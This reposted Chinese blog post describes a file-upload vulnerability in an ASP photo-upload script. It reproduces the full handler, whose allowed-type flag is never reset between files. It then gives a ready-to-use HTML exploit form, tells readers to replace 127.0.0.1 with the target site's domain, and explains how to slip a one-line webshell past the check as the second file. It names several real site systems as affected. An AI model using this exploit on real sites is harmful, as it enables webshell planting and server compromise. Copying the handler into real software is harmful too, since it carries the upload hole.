一段ASP上传漏洞的代码

 来源:http://hacklu.net/blog/

昨天帮别人看了一套ASP的代码，代码如下：

<!--#include file="Inc/upfile_class.asp"-->

<%

const upload_type=0   '上传方法：0=无惧无组件上传类，1=FSO上传 2=lyfupload，3=aspupload，4=chinaaspupload
Const MaxFileSize=2000        '上传文件大小限制      
Const UpFileType="gif|jpg|bmp|png|swf|doc|ppt|wmv|rmvb|avi|rm|mp3"        '允许的上传文件类型
dim upload,oFile,formName,SavePath,filename,fileExt,oFileSize
dim EnableUpload
dim arrUpFileType
dim ranNum
dim msg,FoundErr
dim PhotoUrlID
msg=""
FoundErr=false
EnableUpload=false

%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
BODY{
BACKGROUND-COLOR: #E1F4EE;
font-size:9pt
}
.tx1 { height: 20px;font-size: 9pt; border: 1px solid; border-color: #000000; color: #0000FF}
-->
</style>
</head>
<body leftmargin="2" topmargin="5" marginwidth="0" marginheight="0" >
<%


    select case upload_type
      case 0
        call upload_0()  '使用化境无组件上传类
      case else
        'response.write "本系统未开放插件功能"
        'response.end
    end select
%>
</body>
</html>
<%
sub upload_0()    '使用化境无组件上传类
  set upload=new upfile_class ''建立上传对象
  upload.GetData(104857600)   '取得上传数据,限制最大上传100M
  if upload.err > 0 then  '如果出错
    select case upload.err
      case 1
        response.write "请先选择你要上传的文件！"
      case 2
        response.write "你上传的文件总大小超出了最大限制（100M）"
    end select
    response.end
  end if
  PhotoUrlID=Clng(trim(upload.form("PhotoUrlID")))
  if PhotoUrlID=1 then
    SavePath = "/uploadfile/p_w_picpath/"   '存放上传文件的目录
  elseif PhotoUrlID=2 then
    SavePath = "/uploadfile/p_w_picpath/"   '存放上传文件的目录
     elseif PhotoUrlID=3 or PhotoUrlID=4 then
    SavePath = "/madie"   '存放上传文件的目录
  end if
  if right(SavePath,1)<>"/" then SavePath=SavePath&"/" '在目录后加(/)
    
  for each formName in upload.file '列出所有上传了的文件
    set ofile=upload.file(formName)  '生成一个文件对象
    oFileSize=ofile.filesize
    if oFileSize<100 then
      msg="请先选择你要上传的文件！"
      FoundErr=True
    else
     select case PhotoUrlID
       case 0     
        if oFileSize>(MaxFileSize*1024) then
            msg="文件大小超过了限制，最大只能上传" & CStr(MaxFileSize) & "K的文件！"
       FoundErr=true
        end if
         case 1
        if oFileSize>(10000*1024) then
            msg="文件大小超过了限制，最大只能上传10M的文件！"
       FoundErr=true
        end if
     end select    
    end if

    fileExt=lcase(ofile.FileExt)
    arrUpFileType=split(UpFileType,"|")
    for i=0 to ubound(arrUpFileType)
      if fileEXT=trim(arrUpFileType(i)) then
        EnableUpload=true
        exit for
      end if
    next
    if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
      EnableUpload=false
    end if
    if EnableUpload=false then
      msg="这种文件类型不允许上传！\n\n只允许上传这几种文件类型：" & UpFileType
      FoundErr=true
    end if
    
    
    strJS="<SCRIPT language=javascript>" & vbcrlf
    if FoundErr<>true then
    
      randomize
      ranNum=int(900*rnd)+100
      filename="big"&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
      smallfilename=year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
      ofile.SaveToFile Server.mappath(SavePath&filename)   '保存文件
      
      
      select case PhotoUrlID
        case 1
        
        strJS=strJS & "parent.document.form1.myText2.value+='"&filename&"|';"& vbcrlf
        strJS=strJS & "parent.document.myform.tsmallimg.value='"&smallfilename&"';"& vbcrlf
        strJS=strJS & "parent.jjj();"& vbcrlf
        
        on error resume next

          '----------------------------生成缩略图
Dim Jpeg 
Set Jpeg = Server.CreateObject("Persits.Jpeg") 
If Err then 
err.clear
else

'----------------------------水印文字透明

Path = Server.MapPath(SavePath&filename)'待处理图片路径 

Jpeg.Open Path '打开图片 
If err.number then 
Response.write"打开图片失败,请检查路径！" 
Response.End() 
End if 
Dim aa 
aa=Jpeg.Binary '将原始数据赋给aa 
'=========加文字水印================= 
Jpeg.Canvas.Font.Color = &Hfffffff '水印文字颜色 
Jpeg.Canvas.Font.Family = Arial '字体 
Jpeg.Canvas.Font.Bold = True '是否加粗 
Jpeg.Canvas.Font.Size = 35 '字体大小 
Jpeg.Canvas.Font.ShadowColor = &H000000 '阴影色彩 
Jpeg.Canvas.Font.ShadowYOffset = 1 
Jpeg.Canvas.Font.ShadowXOffset = 1 
Jpeg.Canvas.Brush.Solid = True 
Jpeg.Canvas.Font.Quality = 7 '输出质量 
Jpeg.Canvas.PrintText Jpeg.OriginalWidth/2-100,Jpeg.OriginalHeight/2+20,"www.schoolsale.cn" '水印位置及文字 
bb=Jpeg.Binary '将文字水印处理后的值赋给bb，这时，文字水印没有不透明度 
'============调整文字透明度================ 
Set MyJpeg = Server.CreateObject("Persits.Jpeg") 
MyJpeg.OpenBinary aa 
Set Logo = Server.CreateObject("Persits.Jpeg") 
Logo.OpenBinary bb 
MyJpeg.DrawImage 0,0, Logo, 0.2 '0.3是透明度 
cc=MyJpeg.Binary '将最终结果赋值给cc,这时也可以生成目标图片了 
'response.BinaryWrite cc '将二进输出给浏览器 
MyJpeg.Save Path 
set aa=nothing 
set bb=nothing 
set cc=nothing 
Jpeg.close 
MyJpeg.Close 
Logo.Close


Jpeg.Open Path '打开图片 高与宽为原图片的1/2 
Jpeg.Width = Jpeg.OriginalWidth / 2 
Jpeg.Height = Jpeg.OriginalHeight / 2 
'保存图片 
Jpeg.Save Server.MapPath(SavePath&smallfilename)  

'-----缩络图组件

End If 
'--------------




      '-----------------------------        
                
                
                  
          

        case 2
          strJS=strJS & "var e=parent.document.form1.myText2;" & vbcrlf
          strJS=strJS & "if(e.value=='')parent.document.form1.myText2.value+='" & fileName & "';" & vbcrlf
          strJS=strJS & "else{parent.document.form1.myText2.value+='|" & fileName & "'};" & vbcrlf
          strJS=strJS & "parent.doChangepic(parent.document.form1.myText2,parent.document.form1.myDrop2,parent.document.form1.shoupic);" & vbcrlf
          'strJS=strJS & "parent.document.myform.timgbig.value='" & cstr(round(oFileSize/1024)) & "';" & vbcrlf

        case 3
          strJS=strJS & "parent.document.myform.tsmallimg.value='" & fileName & "';" & vbcrlf
          strJS=strJS & "parent.GO('timgshow').src='/madie/" & fileName & "';" & vbcrlf
          'strJS=strJS & "parent.document.myform.PhotoSize3.value='" & cstr(round(oFileSize/1024)) & "';" & vbcrlf
        case 4
          strJS=strJS & "parent.document.myform.timg.value='" & fileName & "';" & vbcrlf
          strJS=strJS & "parent.document.myform.timgtype.value='" & fileExt & "';" & vbcrlf
          strJS=strJS & "parent.document.myform.timgbig.value='" & cstr(round(oFileSize/1024)) & "';" & vbcrlf
      end select
       msg="文件上传成功!!!!!!! "
       strJS=strJS & "alert('" & msg & "');location.href='upload_Photo.asp?PhotoUrlID=2';" & vbcrlf
    else
            msg="有错误!!!!!!! "
      strJS=strJS & "alert('" & msg & "');" & vbcrlf
        strJS=strJS & "history.go(-1);" & vbcrlf
    end if

        strJS=strJS & "</script>" & vbcrlf
    response.write strJS
    response.Write("文件上传成功")
    
    set file=nothing
  next
  set upload=nothing
end sub
%>


这段代码仔细看的是前面判断“Const UpFileType="gif|jpg|bmp|png|swf|doc|ppt|wmv|rmvb|avi|rm|mp3"

后面判断

if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
      EnableUpload=false
    end if
    if EnableUpload=false then
      msg="这种文件类型不允许上传！\n\n只允许上传这几种文件类型：" & UpFileType
      FoundErr=true
    end if

这种类似的程序有很多，例如很早以前的中景网论坛，动易，天缘学校网站系统。

构造上传表单：


<form action="http://127.0.0.1/Upfile_Photo.asp" method="post" name="form1" enctype="multipart/form-data"> '其中127.0.0.1要改成你要提交的域名URL.
<input name="FileName" type="FILE" class="tx1" size="21" >
<input name="FileName1" type="FILE" class="tx1" size="21" >
<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
<input name="PhotoUrlID" type="hidden" id="PhotoUrlID" value="1">
</form>

这里注意下第一个为正常图片，第二个如果是一句话一定要在两行以上的代码，路径后面加上空格。

转载于:https://blog.51cto.com/obnus/493799